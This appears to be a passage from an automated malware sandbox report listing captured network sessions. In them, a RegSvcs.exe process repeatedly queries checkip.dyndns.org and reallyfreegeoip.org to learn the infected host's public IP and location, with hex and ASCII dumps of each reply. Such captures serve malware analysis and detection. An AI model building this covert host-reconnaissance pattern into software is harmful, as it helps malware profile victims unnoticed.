Jan 11, 2025 03:45:30.926085949 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.11	49866	132.226.8.169	80	8144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:45:31.296261072 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 03:45:32.591072083 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 03:45:32.596558094 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 03:45:32.908710957 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 03:45:33.604463100 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 03:45:33.902832031 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.11	49886	132.226.8.169	80	8144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:45:34.523240089 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 03:45:36.445107937 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.11	49905	132.226.8.169	80	8144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:45:37.034333944 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 03:45:38.870908022 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.11	49924	132.226.8.169	80	8144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:45:39.502974987 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 03:45:41.497575998 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.11	49941	132.226.8.169	80	8144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:45:42.158795118 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 03:45:42.979140043 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.11	49953	132.226.8.169	80	8144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:45:43.625993013 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 03:45:44.483510017 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.11	49964	132.226.8.169	80	8144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:45:45.118638992 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 03:45:46.982456923 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:46 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49759	104.21.64.1	443	7764	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:45:17 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 02:45:17 UTC	857	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:17 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1878307 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rnwiSCbmBl5kkiROZAX%2Foebq3xZigZZFqC9%2BtkgIT6ab2w6Jac9rvf2lg%2BetUgbi%2FElqqToTkFPCR0t9Lwf59xBzrKwmSpxF3EyTXFkfnPYTvdX9xqWKdiJr4xeR8CnyydGdKpiZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900191e2ed71c358-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1617&rtt_var=620&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1745367&cwnd=155&unsent_bytes=0&cid=6906899884e00112&ts=293&x=0"
2025-01-11 02:45:17 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49770	104.21.64.1	443	7764	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:45:18 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 02:45:18 UTC	857	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:18 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1878308 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TV%2FPpf0r3EYlMDsAGxW8lIZpwa7DUUGnU8bzqICo%2Bc425cXnaPgrH1MYvH72DspLLahow%2Bev03ufkrAonL8zBQz9edCTBB2nmvYIXK29LhMlgDpRZNiyA45FxS9zTOvoEsc0%2Fcdn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900191e8dd8f42e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1768&min_rtt=1757&rtt_var=681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1582655&cwnd=240&unsent_bytes=0&cid=fcd4b7841d9b6897&ts=163&x=0"
2025-01-11 02:45:18 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49782	104.21.64.1	443	7764	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:45:20 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 02:45:20 UTC	856	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:20 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1878309 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B8cTurzwA01whJZmMDa8GcrQxe%2FT2bN9qNL%2FwBMu7QXAePdI36VkCDg7Q82xCRqB5go%2B3z1MrN3ENWyjDD6Hy2KLKU8mecwuZa7n2ftib1VER4UsTj2hbt7wbZbTRCsVZDMjQ0mc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900191f309f3c358-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1612&rtt_var=806&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=160730&cwnd=155&unsent_bytes=0&cid=b6327fb5dba04c1a&ts=306&x=0"
2025-01-11 02:45:20 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.11	49804	104.21.64.1	443	7764	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:45:23 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 02:45:24 UTC	857	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1878313 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9T2wnI7ZBiUPAB2j25SQ07tsNW4fKFAe0FPczTqozuLUNsoUmDrX5bs%2FR%2FELo1Int7hbet5gtscRjF3UcXB6CQghGK72aYUmT%2BlstVYSLcrGJ4ZF57dSrDemV%2Bbgv67lviP3b0dT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90019208aa25c358-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1601&rtt_var=611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1773997&cwnd=155&unsent_bytes=0&cid=0899875217f8445a&ts=150&x=0"
2025-01-11 02:45:24 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.11	49821	104.21.64.1	443	7764	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:45:25 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 02:45:25 UTC	853	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1878314 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HiyyiHUgmqxOWgZvbEChxI96CEbdWfO7jFEqmsSNZV0mPqUBGEAcfNEzMXYR%2FCox1WAcsZyZbe6vghuN%2FeHnQhyZKn2jQ2hlQweteMVqbvuTOfCIhF0KWOzfD7a93AiP30yVoWlb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9001921418c64414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1697&rtt_var=651&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1662870&cwnd=180&unsent_bytes=0&cid=ef533fe38424d2aa&ts=153&x=0"
2025-01-11 02:45:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.11	49837	104.21.64.1	443	7764	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:45:27 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 02:45:27 UTC	859	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1878316 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UrlYPx665mPT0jWKptt%2FEkA6sBeJ0eGkvuzN5siqDfV9H3l6bj8uEPm7jUm%2BLqT%2FS3PY00CtdPpwDiMkkERGe5aPcNnXbq1%2BdiDKXQztZ%2FaffEwFLYRg5JbatpjMu17ubpKkLE8W"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900192203fab7c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1960&rtt_var=745&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1459270&cwnd=218&unsent_bytes=0&cid=ee341594ab7e7c74&ts=281&x=0"
2025-01-11 02:45:27 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: 